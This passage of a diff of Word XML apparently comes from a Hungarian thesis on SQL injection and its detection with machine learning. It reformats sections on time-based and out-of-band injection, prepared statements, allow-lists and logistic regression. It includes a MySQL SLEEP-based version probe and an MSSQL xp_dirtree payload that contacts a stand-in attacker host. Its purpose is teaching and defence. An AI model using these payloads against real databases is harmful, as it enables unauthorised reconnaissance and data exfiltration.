-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t használja adatbázisként.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -6775,96 +6095,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Következő lépésként például </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kinyerhető</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>card</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>[5]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 5.x verzióját futtatja.</w:t>
+        <w:t>, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a MySQL 5.x verzióját futtatja.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6887,25 +6124,12 @@
         <w:t>out-of</w:t>
       </w:r>
       <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>band</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SQLi</w:t>
+        <w:t>-band)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6986,7 +6210,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> például a Microsoft SQL Server </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6995,7 +6218,6 @@
         </w:rPr>
         <w:t>xp_dirtree</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7111,150 +6333,42 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amely az alábbi lekérdezést eredményezi: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>xp_dirtree</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> '\\test.attacker.com\' </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[6]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, amely az alábbi lekérdezést eredményezi: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>product</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">=1;EXEC </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>xp_dirtree</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ’\\test.attacker.com\’ </w:t>
+        <w:t xml:space="preserve">SELECT * FROM product WHERE id=1;EXEC master..xp_dirtree ’\\test.attacker.com\’ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7503,43 +6617,7 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Elkészített utasítások (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>prepared</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>statements</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>) használata</w:t>
+        <w:t>Elkészített utasítások (prepared statements) használata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7607,14 +6685,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>boolean-based</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7803,43 +6879,7 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Tárolt eljárások (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>stored</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>procedures</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>) használata</w:t>
+        <w:t>Tárolt eljárások (stored procedures) használata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7947,7 +6987,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> az </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -7956,7 +6995,6 @@
         </w:rPr>
         <w:t>sp_getAccountBalance</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -8070,25 +7108,7 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Engedélyezőlista (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>allow-list</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>) bemenetének ellenőrzése</w:t>
+        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8206,35 +7226,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> („</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>bind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>variables</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>”).</w:t>
+        <w:t xml:space="preserve"> („bind variables”).</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8348,23 +7340,13 @@
         </w:rPr>
         <w:t xml:space="preserve">különböző ágakban vizsgálja a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>tableName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">tableName </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8759,14 +7741,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>supervised</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -8791,14 +7771,12 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>unsupervised</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -8817,14 +7795,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>reinforcement</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -9149,21 +8125,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>„</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>train</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>”</w:t>
+        <w:t>„train”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9187,21 +8149,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>. A címkézett adatok (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>train</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>. A címkézett adatok (train)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9564,7 +8512,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">hoz elkülönített részét, hogy megtanítsuk modellünket a </w:t>
+        <w:t xml:space="preserve">hoz elkülönített részét, hogy megtanítsuk </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>algoritmusunk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10076,21 +9036,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> osztályozás (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>classification</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>) és</w:t>
+        <w:t xml:space="preserve"> osztályozás (classification) és</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10102,21 +9048,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> regresszió (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>regression</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
+        <w:t xml:space="preserve"> regresszió (regression). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10234,48 +9166,20 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>independent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> (independent variables)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>variables</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -10304,35 +9208,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>dependent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>variable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (dependent variable)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10368,7 +9244,6 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="15" w:name="_Toc71471971"/>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10378,34 +9253,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Logistic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Regression</w:t>
+        <w:t>Logistic Regression</w:t>
       </w:r>
       <w:bookmarkEnd w:id="15"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10537,28 +9387,84 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Logistic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Logistic Regression</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Regression</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ennek egy speciális esete</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>mivel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bináris kimenet előrejelzésére</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> alkalmas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, azaz a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z osztály </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">adott értelmezéssel ellátva (sérülékeny, nem sérülékeny) 0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vagy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 lehet.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -10569,78 +9475,6 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ennek egy speciális esete</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>mivel</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> csak</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bináris kimenet előrejelzésére</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> alkalmas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, azaz a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z osztály </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">adott értelmezéssel ellátva (sérülékeny, nem sérülékeny) 0 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vagy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1 lehet.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve">Alapja </w:t>
       </w:r>
       <w:r>
@@ -10649,28 +9483,12 @@
         </w:rPr>
